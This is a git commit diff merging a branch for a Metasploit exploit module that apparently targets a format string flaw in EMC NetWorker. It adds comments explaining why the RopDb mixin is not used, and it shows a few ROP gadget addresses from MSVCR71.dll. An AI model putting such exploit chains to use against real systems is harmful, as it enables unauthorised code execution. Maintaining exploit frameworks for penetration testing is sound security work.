Merge remote branch 'jvazquez-r7/emc_networker_format_string'
commit
70d53b4e2d
|
@ -86,6 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
rop_gadgets =
|
rop_gadgets =
|
||||||
[
|
[
|
||||||
# rop chain generated with mona.py
|
# rop chain generated with mona.py
|
||||||
|
# The RopDb mixin isn't used because there are badchars
|
||||||
|
# which must be avoided
|
||||||
0x7c354dab, # POP EBP # RETN [MSVCR71.dll]
|
0x7c354dab, # POP EBP # RETN [MSVCR71.dll]
|
||||||
0x7c354dab, # skip 4 bytes [MSVCR71.dll]
|
0x7c354dab, # skip 4 bytes [MSVCR71.dll]
|
||||||
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
|
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
|
||||||
|
|
Loading…
Reference in New Issue